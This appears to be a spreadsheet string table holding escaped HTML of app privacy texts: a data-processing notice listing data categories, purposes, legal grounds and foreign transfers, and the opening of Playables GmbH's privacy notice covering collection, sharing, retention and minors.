    <t xml:space="preserve">&lt;/span&gt;&lt;/b&gt;&lt;span style='font-size:11.0pt;_x005F_x000D_
color:black'&gt;Technical infrastructure providers abroad &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-align:justify;text-indent:-.25in;background:_x005F_x000D_
white'&gt;&lt;span lang=TR style='font-size:10.0pt;font-family:"Courier New"'&gt;o&lt;span_x005F_x000D_
style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Purpose of Transfer&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Hosting and technical infrastructure_x005F_x000D_
service&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='text-align:justify;background:white'&gt;&lt;b&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt'&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-size:11.0pt;color:black'&gt;Identification &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;(&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Year of Birth&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;)&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;_x005F_x000D_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of_x005F_x000D_
Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Determining that the person who is to use_x005F_x000D_
the platform is an adult&lt;/span&gt;&lt;span lang=TR style='font-size:11.0pt;_x005F_x000D_
color:black'&gt;, &lt;/span&gt;&lt;span style='font-size:11.0pt;color:black'&gt;Subscription_x005F_x000D_
processes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style='font-size:11.0pt;color:black'&gt;Execution and performance of agreement&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;, &lt;/span&gt;&lt;span style='font-size:_x005F_x000D_
11.0pt;color:black'&gt;Explicit Consent (for transfer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style='font-size:11.0pt;color:black'&gt;Hosting and technical infrastructure_x005F_x000D_
service &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='background:white'&gt;&lt;span style='font-size:11.0pt'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-size:11.0pt;color:black'&gt;Process Security &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;(&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Password and User account Information&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;)&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;_x005F_x000D_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of_x005F_x000D_
Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Implementation of Access Authorizations&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;, &lt;/span&gt;&lt;span style='font-size:_x005F_x000D_
11.0pt;color:black'&gt;Establishing Process Security&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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style='font-size:11.0pt;color:black'&gt;Execution and performance of agreement&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;, &lt;/span&gt;&lt;span style='font-size:_x005F_x000D_
11.0pt;color:black'&gt;Explicit Consent (for transfer abroad)&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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style='font-size:11.0pt;color:black'&gt;Hosting and technical infrastructure_x005F_x000D_
service &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
 &lt;p style='background:white'&gt;&lt;span style='font-size:11.0pt'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoListParagraph style='margin-left:.5in;text-indent:-.25in;_x005F_x000D_
background:white;text-autospace:ideograph-numeric ideograph-other'&gt;&lt;span_x005F_x000D_
style='font-family:"Times New Roman",serif'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-family:"Times New Roman",serif;color:black'&gt;Other_x005F_x000D_
&lt;/span&gt;&lt;/b&gt;&lt;span style='font-family:"Times New Roman",serif;color:</t>
  </si>
  <si>
    <t>black'&gt;(Answers_x005F_x000D_
given to surveys)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of_x005F_x000D_
Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Performance of activities aimed at_x005F_x000D_
customer satisfaction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style='font-size:11.0pt;color:black'&gt;Legitimate interest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style='font-size:11.0pt;color:black'&gt;Hosting and technical &lt;/span&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;infrastructure service &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-size:11.0pt;color:black'&gt;Other &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;(&lt;/span&gt;&lt;i&gt;&lt;span style='font-size:11.0pt;_x005F_x000D_
color:black'&gt;User preferences&lt;/span&gt;&lt;/i&gt;&lt;span style='font-size:11.0pt;_x005F_x000D_
color:black'&gt;)</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Making recommendatio ns based on user_x005F_x000D_
preferences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style='font-size:11.0pt;color:black'&gt;Legitimate interest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style='font-size:11.0pt;color:black'&gt;Hosting and technical &lt;/span&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;infrastructure service &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoListParagraph style='margin-left:.5in;text-align:justify'&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-family:"Times New Roman",serif'&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoListParagraph style='margin-left:.5in;text-indent:-.25in;_x005F_x000D_
background:white;text-autospace:ideograph-numeric ideograph-other'&gt;&lt;span_x005F_x000D_
style='font-family:"Times New Roman",serif'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-family:"Times New Roman",serif;color:black'&gt;ID_x005F_x000D_
&lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span lang=TR style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;(&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;Name Surname&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span lang=TR style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;), &lt;/span&gt;&lt;/i&gt;&lt;b&gt;&lt;span style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;Communication &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span lang=TR style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;(&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;E-Mail Address&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span lang=TR style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;), &lt;/span&gt;&lt;/i&gt;&lt;b&gt;&lt;span style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;Other &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span lang=TR style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;(&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;questions, inquiries and complaints&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span lang=TR_x005F_x000D_
style='font-family:"Times New Roman",serif;color:black'&gt;)&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;_x005F_x000D_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of_x005F_x000D_
Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Management of inquiries and complaints&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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style='font-size:11.0pt;color:black'&gt;Creating a right, Explicit Consent (for_x005F_x000D_
transfer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style='font-size:11.0pt;color:black'&gt;Hosting and technical &lt;/span&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;infrastructure service&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='text-align:justify'&gt;&lt;span lang=TR style='font-family:_x005F_x000D_
"Times New Roman",serif'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
 &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-size:11.0pt;color:black'&gt;Process Security &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;(&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Mobile Device Information&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;), &lt;/span&gt;&lt;/i&gt;&lt;b&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt;color:black'&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style='font-size:_x005F_x000D_
11.0pt;color:black'&gt;Communication &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span lang=TR style='font-size:_x005F_x000D_
11.0pt;color:</t>
  </si>
  <si>
    <t xml:space="preserve">black'&gt;(&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span style='font-size:11.0pt;color:black'&gt;E-Mail_x005F_x000D_
 Address&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;)&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;_x005F_x000D_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of_x005F_x000D_
Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Conducting advertising and marketing_x005F_x000D_
activities&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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style='font-size:11.0pt;color:black'&gt;Explicit consent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abroad,_x005F_x000D_
suppliers/ business partners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style='font-size:11.0pt;color:black'&gt;Conducting advertising and marketing &lt;/span&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;activities&lt;/span&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;, &lt;/span&gt;&lt;span style='font-size:11.0pt;_x005F_x000D_
color:black'&gt;Hosting and &lt;/span&gt;&lt;span style='font-size:11.0pt;color:black'&gt; &lt;/span&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;technical infrastructure service &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;p style='background:white'&gt;&lt;span lang=TR style='font-size:11.0pt'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoListParagraph style='margin-left:.75in;text-align:justify'&gt;&lt;span_x005F_x000D_
lang=TR style='font-family:"Times New Roman",serif'&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;span style='font-size:11.0pt;color:black'&gt;*&lt;b&gt;Identification &lt;/b&gt;&lt;/span&gt;&lt;i&gt;&lt;span_x005F_x000D_
 lang=TR style='font-size:11.0pt;color:black'&gt;(&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;date of birth of the Profile User&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;)&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;_x005F_x000D_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of_x005F_x000D_
Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Contents based on age groups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style='font-size:11.0pt;color:black'&gt;Performance of agreement&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;, &lt;/span&gt;&lt;span style='font-size:_x005F_x000D_
11.0pt;color:black'&gt;Explicit Consent (for transfer abroad)</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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style='font-size:11.0pt;color:black'&gt;Hosting and technical infrastructure_x005F_x000D_
service &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='text-align:justify'&gt;&lt;b&gt;&lt;span lang=TR_x005F_x000D_
style='font-family:"Times New Roman",serif'&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt'&gt;-&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;*&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Identification&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt; &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span style='font-size:_x005F_x000D_
11.0pt;color:black'&gt;(Profile name- [Nickname/ name]) &lt;/span&gt;&lt;/i&gt;&lt;b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;*Other &lt;/span&gt;&lt;/b&gt;&lt;i&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Interests of Profile User, Downloaded/_x005F_x000D_
Liked contents, Content Reading Duration, Badges Used, Contents Read) &lt;/span&gt;&lt;/i&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span lang=TR_x005F_x000D_
style='font-size:11.0pt;font-family:"Courier New"'&gt;o&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-size:11.0pt;color:black'&gt;Purpose of_x005F_x000D_
Processing&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;Improvement of application_x005F_x000D_
experience, Gamification of services, Separation of sub-profiles and reporting_x005F_x000D_
to adults&lt;/span&gt;&lt;/p&gt;_x005F_x000D_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style='font-size:11.0pt;color:black'&gt;Legal Ground&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Performance of agreement&lt;/span&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;, &lt;/span&gt;&lt;span style='font-size:_x005F_x000D_
11.0pt;color:black'&gt;Explicit Consent (for transfer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style='font-size:11.0pt;color:black'&gt;Recipient&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Technical infrastructure providers abroad &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='margin-left:.5in;text-indent:-.25in;background:white'&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;font-family:"Courier New"'&gt;o&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style='font-size:11.0pt;color:black'&gt;Purpose of Transfer&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-size:11.0pt;color:black'&gt;: &lt;/span&gt;&lt;/b&gt;&lt;span_x005F_x000D_
style='font-size:11.0pt;color:black'&gt;Hosting and technical infrastructure_x005F_x000D_
service &lt;/span&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p style='background:white'&gt;&lt;i&gt;&lt;span lang=TR style='font-size:11.0pt;_x005F_x000D_
color:black'&gt;* &lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span style='font-size:11.0pt;color:black'&gt;It_x005F_x000D_
shall be deemed that you are legally authorized to give consent for and on_x005F_x000D_
behalf of the relevant person and you obtained consent of the data subject for_x005F_x000D_
the processing of the profile details in accordance with the Law and this_x005F_x000D_
information notice.</t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/i&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='text-align:justify'&gt;&lt;b&gt;&lt;span lang=TR_x005F_x000D_
style='font-family:"Times New Roman",serif'&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoListParagraph style='margin-left:.5in;text-indent:-.25in;_x005F_x000D_
background:white;text-autospace:ideograph-numeric ideograph-other'&gt;&lt;b&gt;&lt;span_x005F_x000D_
lang=TR style='font-family:"Times New Roman",serif'&gt;2.&lt;span style='font:7.0pt "Times New Roman"'&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;_x005F_x000D_
&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=TR style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;Persons who purchase monthly or yearly subscription to use_x005F_x000D_
additional services in the Platform; &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p class=MsoNormal style='margin-left:.25in;background:white;text-autospace:_x005F_x000D_
ideograph-numeric ideograph-other'&gt;&lt;i&gt;&lt;span style='font-family:"Times New Roman",serif;_x005F_x000D_
color:black'&gt;The information provided below is processed in addition to the_x005F_x000D_
information specified in the category above&lt;/span&gt;&lt;/i&gt;&lt;i&gt;&lt;span lang=TR_x005F_x000D_</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
&lt;head&gt;
	&lt;meta charset="utf-8"/&gt;
    &lt;title&gt;Privacy Policy&lt;/title&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, user-scalable = no"&gt;
    &lt;style&gt;
    	body{
            margin:40px;
    	}
    	.markdown-converted{
    		font-family: sans-serif;
    		line-height: 1.4;
    		max-width: 960px;
    		margin: 0px auto;
    	}
    	.markdown-convert{
    		white-space: pre-line;
    		font-family: monospace;
    		overflow-wrap: all;
    	}
    &lt;/style&gt;
    &lt;script src="js/showdown.min.js"&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class='markdown-convert'&gt;
# PRIVACY NOTICE
**Last updated May 05, 2019**
Thank you for choosing to be part of our community at Playables GmbH ("company", "we", "us", or "our"). We are committed to protecting your personal information and your right to privacy. If you have any questions or concerns about our policy, or our practices with regards to your personal information, please contact us.
</t>
  </si>
  <si>
    <t>When you visit our mobile application, and use our services, you trust us with your personal information. We take your privacy very seriously. In this privacy notice, we describe our privacy policy.</t>
  </si>
  <si>
    <t xml:space="preserve">We seek to explain to you in the clearest way possible what information we collect, how we use it and what rights you have in relation to it. We hope you take some time to read through it carefully, as it is important. If there are any terms in this privacy policy that you do not agree with, please discontinue use of our Apps and our services.
</t>
  </si>
  <si>
    <t>This privacy policy applies to all information collected through our mobile application, ("**Apps**"), and/or any related services, sales, marketing or events (we refer to them collectively in this privacy policy as the "**Sites**"). 
 ## 1. WHAT INFORMATION DO WE COLLECT?
### Information automatically collected
We automatically collect certain information when you visit, use or navigate the Apps.</t>
  </si>
  <si>
    <t>This information does not reveal your specific identity (like your name or contact information) but may include device and usage information, such as your IP address, browser and device characteristics, operating system, language preferences, referring URLs, device name, country, location, information about how and when you use our Apps and other technical information. This information is primarily needed to maintain the security and operation of our Apps, and for our internal analytics and reporting purposes.
 ### Information collected through our Apps
If you use our Apps, we may also collect the following information:
- *Mobile Device Data.</t>
  </si>
  <si>
    <t xml:space="preserve">* We may automatically collect device information (such as your mobile device ID, model and manufacturer), operating system, version information and IP address.
### Information collected from other sources
We may obtain information about you from other sources, such as public databases, joint marketing partners, as well as from other third parties. Examples of the information we receive from other sources include: social media profile information; marketing leads and search results and links, including paid listings (such as sponsored links).
</t>
  </si>
  <si>
    <t>## 2. HOW DO WE USE YOUR INFORMATION?
 We use personal information collected via our Apps for a variety of business purposes described below.</t>
  </si>
  <si>
    <t>We process your personal information for these purposes in reliance on our legitimate business interests ("Business Purposes"), in order to enter into or perform a contract with you ("Contractual"), with your consent ("Consent"), and/or for compliance with our legal obligations ("Legal Reasons"). We indicate the specific processing grounds we rely on next to each purpose listed below.  
 We use the information we collect or receive:
- **For other Business Purposes.</t>
  </si>
  <si>
    <t>* * We may use your information for other Business Purposes, such as data analysis, identifying usage trends, determining the effectiveness of our promotional campaigns and to evaluate and improve our Apps, products, services, marketing and your experience.
## 3.</t>
  </si>
  <si>
    <t>WILL YOUR INFORMATION BE SHARED WITH ANYONE? 
 We may process or share data based on the following legal basis:
-   **Consent:** We may process your data if you have given us specific consent to use your personal information in a specific purpose.
-   **Legitimate Interests:**</t>
  </si>
  <si>
    <t xml:space="preserve">We may process your data when it is reasonably necessary to achieve our legitimate business interests.
-   **Performance of a Contract:** Where we have entered into a contract with you, we may process your personal information to fulfill the terms of our contract.
-    **Legal Obligations:** We may disclose your information where we are legally required to do so in order to comply with applicable law, governmental requests, a judicial proceeding, court order, or legal process, such as in response to a court order or a subpoena (including in response to public authorities to meet national security or law enforcement requirements).
-   </t>
  </si>
  <si>
    <t>**Vital Interests:** We may disclose your information where we believe it is necessary to investigate, prevent, or take action regarding potential violations of our policies, suspected fraud, situations involving potential threats to the safety of any person and illegal activities, or as evidence in litigation in which we are involved.
 More specifically, we may need to process your data or share your personal information in the following situations:   
-   **Vendors, Consultants and Other Third-Party Service Providers.</t>
  </si>
  <si>
    <t>* * We may share your data with third party vendors, service providers, contractors or agents who perform services for us or on our behalf and require access to such information to do that work. Examples include: payment processing, data analysis, email delivery, hosting services, customer service and marketing efforts.</t>
  </si>
  <si>
    <t>We may allow selected third parties to use tracking technology on the Apps, which will enable them to collect data about how you interact with the Apps over time. This information may be used to, among other things, analyze and track data, determine the popularity of certain content and better understand online activity. Unless described in this Policy, we do not share, sell, rent or trade any of your information with third parties for their promotional purposes.
-   **Business Transfers.</t>
  </si>
  <si>
    <t>* * We may share or transfer your information in connection with, or during negotiations of, any merger, sale of company assets, financing, or acquisition of all or a portion of our business to another company.
-   **Business Partners. *</t>
  </si>
  <si>
    <t>* We may share your information with our business partners to offer you certain products, services or promotions.     
 ## 4.</t>
  </si>
  <si>
    <t>WHO WILL YOUR INFORMATION BE SHARED WITH?
 We only share and disclose your information with the following third parties. We have categorized each party so that you may be easily understand the purpose of our data collection and processing practices.</t>
  </si>
  <si>
    <t>If we have processed your data based on your consent and you wish to revoke your consent, please contact us.  
-   **Web and Mobile Analytics**
    Unity Analytics
## 5. HOW LONG DO WE KEEP YOUR INFORMATION?
 We will only keep your personal information for as long as it is necessary for the purposes set out in this privacy policy, unless a longer retention period is required or permitted by law (such as tax, accounting or other legal requirements).</t>
  </si>
  <si>
    <t>No purpose in this policy will require us keeping your personal information for longer than 2 years.
 When we have no ongoing legitimate business need to process your personal information, we will either delete or anonymize it, or, if this is not possible (for example, because your personal information has been stored in backup archives), then we will securely store your personal information and isolate it from any further processing until deletion is possible.
 ## 6.</t>
  </si>
  <si>
    <t>HOW DO WE KEEP YOUR INFORMATION SAFE?
 We have implemented appropriate technical and organisational security measures designed to protect the security of any personal information we process. However, please also remember that we cannot guarantee that the internet itself is 100% secure.</t>
  </si>
  <si>
    <t xml:space="preserve">Although we will do our best to protect your personal information, transmission of personal information to and from our Apps is at your own risk. You should only access the services within a secure environment.
## 7. DO WE COLLECT INFORMATION FROM MINORS?
</t>
  </si>
  <si>
    <t>We do not knowingly solicit data from or market to children under 13 years of age. By using the Apps, you represent that you are at least 13 or that you are the parent or guardian of such a minor and consent to such minor dependent's use of the Apps. If we learn that personal information from users less than 18 years of age has been collected, we will deactivate the account and take reasonable measures to promptly delete such data from our records.</t>
  </si>
  <si>
    <t>If you become aware of any data we have collected from children under age 13, please contact us.
## 8. WHAT ARE YOUR PRIVACY RIGHTS?
 In some regions (like the European Economic Area), you have certain rights under applicable data protection laws.</t>
  </si>
  <si>
